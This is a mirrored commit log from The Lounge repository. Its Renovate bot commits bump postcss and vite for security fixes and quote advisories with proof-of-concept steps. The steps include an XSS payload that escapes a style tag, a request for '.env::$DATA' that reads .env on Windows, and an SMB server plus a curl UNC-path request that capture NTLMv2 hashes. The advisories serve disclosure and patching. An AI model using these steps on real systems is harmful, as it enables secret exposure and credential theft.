mirror/thelounge
1
0
Fork 0
mirror of https://github.com/thelounge/thelounge.git synced 2026-06-20 19:38:39 -04:00
Code Issues Packages Projects Releases Wiki Activity
7,969 Commits 71 Branches 122 Tags
master
Commit Graph

7969 Commits

This Branch
This Branch
All Branches
Author SHA1 Message Date
Max Leiter
806d2118a5 v4.5.1-rc.1 v4.5.1-rc.1 2026-06-17 23:25:42 -07:00
Max Leiter
302a61f735 Add changelog entry for v4.5.1-rc.1 2026-06-17 23:25:36 -07:00
renovate[bot]
3273cde3fb Update dependency postcss to v8.5.10 [SECURITY] (#5104) 
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [postcss](https://postcss.org/)
([source](https://redirect.github.com/postcss/postcss)) | [`8.4.47` →
`8.5.10`](https://renovatebot.com/diffs/npm/postcss/8.4.47/8.5.10) |
![age](https://developer.mend.io/api/mc/badges/age/npm/postcss/8.5.10?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/postcss/8.4.47/8.5.10?slim=true)
|

---

### PostCSS has XSS via Unescaped </style> in its CSS Stringify Output
[CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305) /
[GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)

<details>
<summary>More information</summary>

#### Details
##### PostCSS: XSS via Unescaped `</style>` in CSS Stringify Output

##### Summary

PostCSS v8.5.5 (latest) does not escape `</style>` sequences when
stringifying CSS ASTs. When user-submitted CSS is parsed and
re-stringified for embedding in HTML `<style>` tags, `</style>` in CSS
values breaks out of the style context, enabling XSS.

##### Proof of Concept

```javascript
const postcss = require('postcss');

// Parse user CSS and re-stringify for page embedding
const userCSS = 'body { content: "</style><script>alert(1)</script><style>"; }';
const ast = postcss.parse(userCSS);
const output = ast.toResult().css;
const html = `<style>${output}</style>`;

console.log(html);
// <style>body { content: "</style><script>alert(1)</script><style>"; }</style>
//
// Browser: </style> closes the style tag, <script> executes
```

**Tested output** (Node.js v22, postcss v8.5.5):
```
Input: body { content: "</style><script>alert(1)</script><style>"; }
Output: body { content: "</style><script>alert(1)</script><style>"; }
Contains </style>: true
```

##### Impact

Impact non-bundler use cases since bundlers for XSS on their own.
Requires some PostCSS plugin to have malware code, which can inject XSS
to website.

##### Suggested Fix

Escape `</style` in all stringified output values:
```javascript
output = output.replace(/<\/(style)/gi, '<\\/$1');
```

##### Credits
Discovered and reported by [Sunil Kumar](https://tharvid.in)
([@&#8203;TharVid](https://redirect.github.com/TharVid))

#### Severity
- CVSS Score: 6.1 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`

#### References
-
[https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305)
-
[https://github.com/postcss/postcss/releases/tag/8.5.10](https://redirect.github.com/postcss/postcss/releases/tag/8.5.10)
-
[https://github.com/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>postcss/postcss (postcss)</summary>

###
[`v8.5.10`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#8510)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.9...8.5.10)

- Fixed XSS via unescaped `</style>` in non-bundler cases (by
[@&#8203;TharVid](https://redirect.github.com/TharVid)).

###
[`v8.5.9`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#859)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.8...8.5.9)

- Speed up source map encoding paring in case of the error.

###
[`v8.5.8`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#858)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.7...8.5.8)

- Fixed `Processor#version`.

###
[`v8.5.7`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#857)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.6...8.5.7)

- Improved source map annotation cleaning performance (by CodeAnt AI).

###
[`v8.5.6`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#856)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.5...8.5.6)

- Fixed `ContainerWithChildren` type discriminating (by
[@&#8203;Goodwine](https://redirect.github.com/Goodwine)).

###
[`v8.5.5`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#855)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.4...8.5.5)

- Fixed `package.json`→`exports` compatibility with some tools (by
[@&#8203;JounQin](https://redirect.github.com/JounQin)).

###
[`v8.5.4`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#854)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.3...8.5.4)

- Fixed Parcel compatibility issue (by
[@&#8203;git-sumitchaudhary](https://redirect.github.com/git-sumitchaudhary)).

###
[`v8.5.3`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#853)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.2...8.5.3)

- Added more details to `Unknown word` error (by
[@&#8203;hiepxanh](https://redirect.github.com/hiepxanh)).
- Fixed types (by
[@&#8203;romainmenke](https://redirect.github.com/romainmenke)).
- Fixed docs (by
[@&#8203;catnipan](https://redirect.github.com/catnipan)).

###
[`v8.5.2`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#852)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.1...8.5.2)

- Fixed end position of rules with semicolon (by
[@&#8203;romainmenke](https://redirect.github.com/romainmenke)).

###
[`v8.5.1`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#851)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.0...8.5.1)

- Fixed backwards compatibility for complex cases (by
[@&#8203;romainmenke](https://redirect.github.com/romainmenke)).

###
[`v8.5.0`](https://redirect.github.com/postcss/postcss/releases/tag/8.5.0):
8.5 “Duke Alloces”

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.4.49...8.5.0)

<img
src="https://github.com/user-attachments/assets/6ef654a0-d675-4ba0-a670-e28ef27062f5"
align="right" width="200" height="200" alt="President Alloces seal">

PostCSS 8.5 brought API to work better with non-CSS sources like HTML,
Vue.js/Svelte sources or CSS-in-JS.

[@&#8203;romainmenke](https://redirect.github.com/romainmenke) during
[his work](https://redirect.github.com/postcss/postcss/issues/1995) on
[Stylelint](https://stylelint.io) added `Input#document` in additional
to `Input#css`.

```js
root.source.input.document //=> "<p>Hello</p>
                           //    <style>
                           //    p {
                           //      color: green;
                           //    }
                           //    </style>"
root.source.input.css      //=> "p {
                           //      color: green;
                           //    }"

```

#### Thanks to Sponsors

This release was possible thanks to our community.

If your company wants to support the sustainability of front-end
infrastructure or wants to give some love to PostCSS, you can join our
supporters by:

- [**Tidelift**](https://tidelift.com/) with a Spotify-like subscription
model supporting all projects from your lock file.
- Direct donations at [**GitHub
Sponsors**](https://redirect.github.com/sponsors/ai) or [**Open
Collective**](https://opencollective.com/postcss#section-contributors).

###
[`v8.4.49`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#8449)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.4.48...8.4.49)

- Fixed custom syntax without `source.offset` (by
[@&#8203;romainmenke](https://redirect.github.com/romainmenke)).

###
[`v8.4.48`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#8448)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.4.47...8.4.48)

- Fixed position calculation in error/warnings methods (by
[@&#8203;romainmenke](https://redirect.github.com/romainmenke)).

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/thelounge/thelounge).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTguMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoibWFzdGVyIiwibGFiZWxzIjpbIlR5cGU6IFNlY3VyaXR5Il19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
 2026-06-17 22:49:36 -07:00
renovate[bot]
cd949d0188 Update dependency vite to v8.0.16 [SECURITY] (#5110) 
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [vite](https://vite.dev)
([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite))
| [`8.0.8` →
`8.0.16`](https://renovatebot.com/diffs/npm/vite/8.0.8/8.0.16) |
![age](https://developer.mend.io/api/mc/badges/age/npm/vite/8.0.16?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/vite/8.0.8/8.0.16?slim=true)
|

---

### vite: `server.fs.deny` bypass on Windows alternate paths
[CVE-2026-53571](https://nvd.nist.gov/vuln/detail/CVE-2026-53571) /
[GHSA-fx2h-pf6j-xcff](https://redirect.github.com/advisories/GHSA-fx2h-pf6j-xcff)

<details>
<summary>More information</summary>

#### Details
##### Summary

The contents of files that are specified by
[`server.fs.deny`](https://vite.dev/config/server-options#server-fs-deny)
can be returned to the browser on Windows.

##### Impact

Only apps that match the following conditions are affected:

- explicitly exposes the Vite dev server to the network (using `--host`
or [`server.host` config
option](https://vitejs.dev/config/server-options.html#server-host))
- the sensitive file exists in the allowed directories specified by
[`server.fs.allow`](https://vite.dev/config/server-options#server-fs-allow)
- either of:
  - the sensitive file exists in an NTFS volume
- the dev server is running on Windows and the sensitive file exists in
a volume that 8.3 short name generation is enabled (it is enabled by
default on system volumes)

##### Details

Vite’s dev server denies direct access to sensitive files through
`server.fs.deny`, including entries such as `.env`, `.env.*`, and
`*.{crt,pem}`. However, on Windows, the deny logic does not correctly
normalize NTFS ADS path forms before access checks are applied.
Because of this, requests such as `/.env::$DATA?raw` are treated as
allowed paths, while Windows resolves them to the original file's
default data stream.

Similar to that, Windows allows accessing a file using a different name
with the 8.3 short name compatibility feature. Vite did not reject
accessing files via them.

##### PoC
```bash
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev
```
Access via browser at `http://localhost:5173/.env::$DATA?raw`
<img width="388" height="129" alt="deecc1315123883cfd0f9c26a002845a"
src="https://github.com/user-attachments/assets/895c6012-4e2e-4a35-babb-69bbf3ee7170"
/>

Example expected result:
- `/.env::$DATA?raw` returns the contents of `.env`
- `/tls.pem::$DATA?raw` returns the contents of `tls.pem`

#### Severity
- CVSS Score: 8.2 / 10 (High)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/vitejs/vite/security/advisories/GHSA-fx2h-pf6j-xcff](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-fx2h-pf6j-xcff)
-
[https://github.com/advisories/GHSA-fx2h-pf6j-xcff](https://redirect.github.com/advisories/GHSA-fx2h-pf6j-xcff)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-fx2h-pf6j-xcff)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### launch-editor: NTLMv2 hash disclosure via UNC path handling on
Windows
[CVE-2026-53632](https://nvd.nist.gov/vuln/detail/CVE-2026-53632) /
[GHSA-v6wh-96g9-6wx3](https://redirect.github.com/advisories/GHSA-v6wh-96g9-6wx3)

<details>
<summary>More information</summary>

#### Details
##### Summary
The `launch-editor` NPM package accesses arbitrary paths including
Windows UNC paths. When a UNC path is opened, Windows automatically
attempts NTLM authentication to the remote host, causing the user’s
NTLMv2 password hash to be leaked to an attacker-controlled SMB server.
This can result in credential compromise through offline hash cracking.

##### Impact

If the following conditions are met, an attacker can get the NTLMv2
password hash on the computer that is using the `launch-editor`:

- using Windows
- NTLM is not disabled ([it is recommended to
disable](https://techcommunity.microsoft.com/blog/windows-itpro-blog/advancing-windows-security-disabling-ntlm-by-default/4489526),
while it's still enabled by default)
- the user accesses the attackers website that sends request to a
middleware using `launch-editor`
- the server that has the middleware using `launch-editor` is running
- the attacker knows the URL for that server and the middleware

This would be a problem if the user password is too simple that it can
be identified through offline hash cracking, potentially leading to
further compromise of developer accounts or internal systems.

##### Details
`launch-editor` accepts file paths without validating or restricting
Windows UNC paths such as:

```
\\attacker-host\share
```

On Windows systems, accessing a UNC path triggers an automatic NTLM
authentication attempt to the remote SMB server. No user interaction or
warning is required for this authentication attempt to occur.

If an attacker controls the SMB server referenced by the UNC path the
victim’s NTLMv2 hash is transmitted to the attacker. The attacker can
then capture the hash and perform offline password cracking. Successful
cracking reveals the victim’s cleartext password.

The attacker could target a developer that uses a development server
using `launch-editor` to develop code locally, send them a link and grab
their NTLMv2 hash.

##### PoC
From the attacker side, we will setup an SMB server. I personally used
[Impacket's
smbserver.py](https://redirect.github.com/fortra/impacket/blob/master/examples/smbserver.py),
but you could use something like
[Responder](https://redirect.github.com/lgandx/Responder) for this as
well. For keeping it simple, we will use `smbserver.py` here.

First, let's create a directory to serve as an SMB share.
```
mkdir /tmp/data
echo "Hello world" > /tmp/data/test.txt
```

Then, start the SMB server.
```
$ sudo smbserver.py -smb2support -debug share /tmp/data
```

Now, run any project that uses the launch-editor package. I have setup a
simple "Hello world" project that uses Vite to do this. Then run the
project locally (`vite`).

Now last, we will open a browser window and navigate to the URL used by
the launch-editor package to trigger the NTLM authentication. Or we can
use `curl` to achieve the same.

```
curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'
```

Note the IP address in the HTTP request, and make sure it connects to
the IP address of the SMB server. Now we can look at the logs of
`smbserver.py` and see the NTLMv2 hash coming in.

<img width="1916" height="277" alt="2026-01-30_10-58"
src="https://github.com/user-attachments/assets/2f606e8f-c9bb-41dc-b507-ea6606b53368"
/>

#### Severity
- CVSS Score: 5.5 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H`

#### References
-
[https://github.com/vitejs/launch-editor/security/advisories/GHSA-v6wh-96g9-6wx3](https://redirect.github.com/vitejs/launch-editor/security/advisories/GHSA-v6wh-96g9-6wx3)
-
[https://github.com/advisories/GHSA-v6wh-96g9-6wx3](https://redirect.github.com/advisories/GHSA-v6wh-96g9-6wx3)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-v6wh-96g9-6wx3)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>vitejs/vite (vite)</summary>

###
[`v8.0.16`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-8016-2026-06-01-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v8.0.15...v8.0.16)

##### Bug Fixes

- **deps:** reject UNC paths for launch-editor-middleware
([#&#8203;22571](https://redirect.github.com/vitejs/vite/issues/22571))
([50b9512](50b951225b))
- reject windows alternate paths
([#&#8203;22572](https://redirect.github.com/vitejs/vite/issues/22572))
([dc245c7](dc245c71e5))

###
[`v8.0.15`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-8015-2026-06-01-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v8.0.14...v8.0.15)

##### Features

- send 408 on request timeout
([#&#8203;22476](https://redirect.github.com/vitejs/vite/issues/22476))
([c85c9ee](c85c9eeb9a))
- update rolldown to 1.0.3
([#&#8203;22538](https://redirect.github.com/vitejs/vite/issues/22538))
([646dbed](646dbedd28))

##### Bug Fixes

- capitalize error messages and remove spurious space in parse error
([#&#8203;22488](https://redirect.github.com/vitejs/vite/issues/22488))
([85a0eff](85a0eff1c8))
- **deps:** update all non-major dependencies
([#&#8203;22511](https://redirect.github.com/vitejs/vite/issues/22511))
([2686d7d](2686d7d0b7))
- **dev:** fix html-proxy cache key mismatch for /@&#8203;fs/ HTML paths
([#&#8203;21762](https://redirect.github.com/vitejs/vite/issues/21762))
([47c4213](47c4213f13))
- **glob:** error on relative glob in virtual module when no files match
([#&#8203;22497](https://redirect.github.com/vitejs/vite/issues/22497))
([5c8e98f](5c8e98f8b5))
- **optimizer:** close the rolldown bundle when write() rejects
([#&#8203;22528](https://redirect.github.com/vitejs/vite/issues/22528))
([e3cfb9d](e3cfb9deec))
- **resolve:** provide onWarn for viteResolvePlugin in JS plugin
containers
([#&#8203;22509](https://redirect.github.com/vitejs/vite/issues/22509))
([40985f1](40985f1c09))

##### Miscellaneous Chores

- **deps:** update rolldown-related dependencies
([#&#8203;22566](https://redirect.github.com/vitejs/vite/issues/22566))
([3052a67](3052a67d93))

##### Code Refactoring

- correct logic in `collectAllModules` function
([#&#8203;22562](https://redirect.github.com/vitejs/vite/issues/22562))
([6978a9c](6978a9ceb9))

###
[`v8.0.14`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-8014-2026-05-21-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v8.0.13...v8.0.14)

##### Features

- update rolldown to 1.0.2
([#&#8203;22484](https://redirect.github.com/vitejs/vite/issues/22484))
([96efc88](96efc88570))

##### Bug Fixes

- **deps:** update all non-major dependencies
([#&#8203;22471](https://redirect.github.com/vitejs/vite/issues/22471))
([98b8163](98b8163213))
- **dev:** handle errors when sending messages to vite server
([#&#8203;22450](https://redirect.github.com/vitejs/vite/issues/22450))
([e8e9a34](e8e9a34dcf))
- **html:** handle trailing slash paths in transformIndexHtml
([#&#8203;22480](https://redirect.github.com/vitejs/vite/issues/22480))
([5d94d1b](5d94d1bffd))
- **optimizer:** pass oxc jsx options to transformSync in dependency
scan
([#&#8203;22342](https://redirect.github.com/vitejs/vite/issues/22342))
([b3132da](b3132dacea))

##### Miscellaneous Chores

- **deps:** update rolldown-related dependencies
([#&#8203;22470](https://redirect.github.com/vitejs/vite/issues/22470))
([7cb728e](7cb728eb62))
- remove irrelevant commits from changelog
([2c69495](2c69495f25))

##### Code Refactoring

- **glob:** do not rewrite import path for absolute base
([#&#8203;22310](https://redirect.github.com/vitejs/vite/issues/22310))
([0ae2844](0ae2844ab6))

##### Tests

- **css:** sass does not use main field
([#&#8203;22449](https://redirect.github.com/vitejs/vite/issues/22449))
([ebf39a0](ebf39a0432))

###
[`v8.0.13`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-8013-2026-05-14-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v8.0.12...v8.0.13)

##### Features

- **bundled-dev:** add lazy bundling support
([#&#8203;21406](https://redirect.github.com/vitejs/vite/issues/21406))
([4f0949f](4f0949f3f1))
- **optimizer:** improve the esbuild plugin converter to pass some
properties of build result to `onEnd`
([#&#8203;22357](https://redirect.github.com/vitejs/vite/issues/22357))
([47071ce](47071ce53f))
- update rolldown to 1.0.1
([#&#8203;22444](https://redirect.github.com/vitejs/vite/issues/22444))
([8c766a6](8c766a6c5e))

##### Bug Fixes

- **build:** copy public directory after building same environment with
`write=false`
([#&#8203;22328](https://redirect.github.com/vitejs/vite/issues/22328))
([158e8ae](158e8ae8ef))
- **css:** await sass/less/styl worker disposal on teardown (fix
[#&#8203;22274](https://redirect.github.com/vitejs/vite/issues/22274))
([#&#8203;22275](https://redirect.github.com/vitejs/vite/issues/22275))
([b7edcb7](b7edcb7d0d))
- **css:** keep deprecated `name`/`originalFileName` in synthetic
`assetFileNames` call
([#&#8203;22439](https://redirect.github.com/vitejs/vite/issues/22439))
([8e59c97](8e59c97a44))
- make `isBundled` per environment
([#&#8203;22257](https://redirect.github.com/vitejs/vite/issues/22257))
([a576326](a576326617))
- **ssr:** avoid rewriting labels that collide with imports
([#&#8203;22451](https://redirect.github.com/vitejs/vite/issues/22451))
([d9b18e0](d9b18e0387))

##### Miscellaneous Chores

- remove irrelevant commits from changelog
([#&#8203;22430](https://redirect.github.com/vitejs/vite/issues/22430))
([6ea3838](6ea383859a))
- update changelog
([#&#8203;22413](https://redirect.github.com/vitejs/vite/issues/22413))
([fcdc87c](fcdc87cc67))

###
[`v8.0.12`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-8012-2026-05-11-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v8.0.11...v8.0.12)

##### Features

- update rolldown to 1.0.0
([#&#8203;22401](https://redirect.github.com/vitejs/vite/issues/22401))
([cf0ff41](cf0ff4154b))

##### Bug Fixes

- **create-vite:** pass react framework to TanStack CLI
([#&#8203;22397](https://redirect.github.com/vitejs/vite/issues/22397))
([18f0f90](18f0f90444))
- **deps:** update all non-major dependencies
([#&#8203;22420](https://redirect.github.com/vitejs/vite/issues/22420))
([2be6000](2be6000130))
- **module-runner:** prevent partial-exports race on concurrent imports
of in-flight invalidated re-export chains
([#&#8203;22369](https://redirect.github.com/vitejs/vite/issues/22369))
([f5a22e6](f5a22e62ad))
- refer to `rolldownOptions` instead of deprecated `rollupOptions` in
messages
([#&#8203;22400](https://redirect.github.com/vitejs/vite/issues/22400))
([b675c7b](b675c7b669))
- **worker:** apply `build.target` to worker bundle
([#&#8203;22404](https://redirect.github.com/vitejs/vite/issues/22404))
([3c93fde](3c93fde21f))
- **worker:** forward define to worker bundle transform
([#&#8203;22408](https://redirect.github.com/vitejs/vite/issues/22408))
([d4838a0](d4838a0358))

##### Miscellaneous Chores

- **deps:** update dependency eslint-plugin-n to v18
([#&#8203;22423](https://redirect.github.com/vitejs/vite/issues/22423))
([2fe7bd2](2fe7bd2d73))
- **deps:** update rolldown-related dependencies
([#&#8203;22421](https://redirect.github.com/vitejs/vite/issues/22421))
([66b9eb3](66b9eb3518))

###
[`v8.0.11`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-8011-2026-05-07-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v8.0.10...v8.0.11)

##### Features

- update rolldown to 1.0.0-rc.18
([#&#8203;22360](https://redirect.github.com/vitejs/vite/issues/22360))
([3f80524](3f80524aa1))

##### Bug Fixes

- **deps:** update all non-major dependencies
([#&#8203;22334](https://redirect.github.com/vitejs/vite/issues/22334))
([672c962](672c96288f))
- **deps:** update all non-major dependencies
([#&#8203;22382](https://redirect.github.com/vitejs/vite/issues/22382))
([5c0cfcb](5c0cfcb83d))
- **glob:** align hmr matcher options with glob enumeration
([#&#8203;22306](https://redirect.github.com/vitejs/vite/issues/22306))
([30028f9](30028f9451))
- make separate object instance for each environment
([#&#8203;22276](https://redirect.github.com/vitejs/vite/issues/22276))
([7c2aa3b](7c2aa3b40b))

##### Documentation

- **create-vite:** list react-compiler templates in README
([#&#8203;22347](https://redirect.github.com/vitejs/vite/issues/22347))
([7c3a61f](7c3a61f42d))
- explain mergeConfig skips null/undefined
([#&#8203;22325](https://redirect.github.com/vitejs/vite/issues/22325))
([2151f70](2151f701dc))
- mention native config loader in CLI options
([#&#8203;22348](https://redirect.github.com/vitejs/vite/issues/22348))
([0420c5d](0420c5d37b))
- update evan's x handle
([640202a](640202a216))

##### Miscellaneous Chores

- **deps:** update dependency tsdown to ^0.21.10
([#&#8203;22333](https://redirect.github.com/vitejs/vite/issues/22333))
([3b51e05](3b51e05021))
- **deps:** update rolldown-related dependencies
([#&#8203;22383](https://redirect.github.com/vitejs/vite/issues/22383))
([555ff36](555ff36de7))
- **deps:** update transitive packages to fix npm audit alerts
([#&#8203;22316](https://redirect.github.com/vitejs/vite/issues/22316))
([86aee62](86aee6268a))

##### Code Refactoring

- devtools integration
([#&#8203;22312](https://redirect.github.com/vitejs/vite/issues/22312))
([3c8bf06](3c8bf064ec))
- remove unnecessary async
([#&#8203;22296](https://redirect.github.com/vitejs/vite/issues/22296))
([b31fd35](b31fd355d9))
- show direct path type in bad character warning
([#&#8203;22339](https://redirect.github.com/vitejs/vite/issues/22339))
([0c162e9](0c162e96a6))

##### Tests

- **create-vite:** use short help alias
([#&#8203;22389](https://redirect.github.com/vitejs/vite/issues/22389))
([994ab66](994ab66bc4))

###
[`v8.0.10`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-8010-2026-04-23-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v8.0.9...v8.0.10)

##### Features

- update rolldown to 1.0.0-rc.17
([#&#8203;22299](https://redirect.github.com/vitejs/vite/issues/22299))
([a4d06d9](a4d06d9015))

##### Bug Fixes

- `hmrClient.logger.debug` and `hmrClient.logger.error` looked different
from other HMR logs
([#&#8203;22147](https://redirect.github.com/vitejs/vite/issues/22147))
([a4d828f](a4d828f2d5))
- **css:** show filename in CSS minification warnings for `.css?inline`
([#&#8203;22292](https://redirect.github.com/vitejs/vite/issues/22292))
([83f0a78](83f0a785a2))
- **optimizer:** allow user transform.target to override default in
optimizeDeps
([#&#8203;22273](https://redirect.github.com/vitejs/vite/issues/22273))
([5c7cec6](5c7cec69b6))
- remove format sniffing module resolution from JS resolver
([#&#8203;22297](https://redirect.github.com/vitejs/vite/issues/22297))
([b8a21cc](b8a21cc821))

##### Code Refactoring

- enable some typecheck rules
([#&#8203;22278](https://redirect.github.com/vitejs/vite/issues/22278))
([9437518](943751801f))
- typecheck client directory
([#&#8203;22284](https://redirect.github.com/vitejs/vite/issues/22284))
([40a0847](40a0847276))

###
[`v8.0.9`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-809-2026-04-20-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v8.0.8...v8.0.9)

##### Features

- update rolldown to 1.0.0-rc.16
([#&#8203;22248](https://redirect.github.com/vitejs/vite/issues/22248))
([2947edd](2947edd57c))

##### Bug Fixes

- allow binding when strictPort is set but wildcard port is in use
([#&#8203;22150](https://redirect.github.com/vitejs/vite/issues/22150))
([dfc8aa5](dfc8aa5057))
- **build:** emptyOutDir should happen for watch rebuilds
([#&#8203;22207](https://redirect.github.com/vitejs/vite/issues/22207))
([ee52267](ee522672bb))
- **bundled-dev:** reject requests to HMR patch files in non potentially
trustworthy origins
([#&#8203;22269](https://redirect.github.com/vitejs/vite/issues/22269))
([868f141](868f1411a6))
- **css:** use unique key for cssEntriesMap to prevent same-basename
collision
([#&#8203;22039](https://redirect.github.com/vitejs/vite/issues/22039))
([374bb5d](374bb5d597))
- **deps:** update all non-major dependencies
([#&#8203;22219](https://redirect.github.com/vitejs/vite/issues/22219))
([4cd0d67](4cd0d6760e))
- **deps:** update all non-major dependencies
([#&#8203;22268](https://redirect.github.com/vitejs/vite/issues/22268))
([c28e9c1](c28e9c12a8))
- detect Deno workspace root (fix
[#&#8203;22237](https://redirect.github.com/vitejs/vite/issues/22237))
([#&#8203;22238](https://redirect.github.com/vitejs/vite/issues/22238))
([1b793c0](1b793c0e17))
- **dev:** handle errors in `watchChange` hook
([#&#8203;22188](https://redirect.github.com/vitejs/vite/issues/22188))
([fc08bda](fc08bdab9b))
- **optimizer:** handle more chars that will be sanitized
([#&#8203;22208](https://redirect.github.com/vitejs/vite/issues/22208))
([3f24533](3f24533ac4))
- skip fallback sourcemap generation for `?raw` imports
([#&#8203;22148](https://redirect.github.com/vitejs/vite/issues/22148))
([3ec9cda](3ec9cdaac7))

##### Documentation

- align the descriptions in READMEs
([#&#8203;22231](https://redirect.github.com/vitejs/vite/issues/22231))
([44c42b9](44c42b9763))
- fix reuses wording in dev environment comment
([#&#8203;22173](https://redirect.github.com/vitejs/vite/issues/22173))
([9163412](9163412fdf))
- fix wording in sass error comment
([#&#8203;22214](https://redirect.github.com/vitejs/vite/issues/22214))
([bc5c6a7](bc5c6a7a49))
- update build CLI defaults
([#&#8203;22261](https://redirect.github.com/vitejs/vite/issues/22261))
([605bb97](605bb97994))

##### Miscellaneous Chores

- **deps:** update dependency dotenv-expand to v13
([#&#8203;22271](https://redirect.github.com/vitejs/vite/issues/22271))
([0a3887d](0a3887da18))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/thelounge/thelounge).

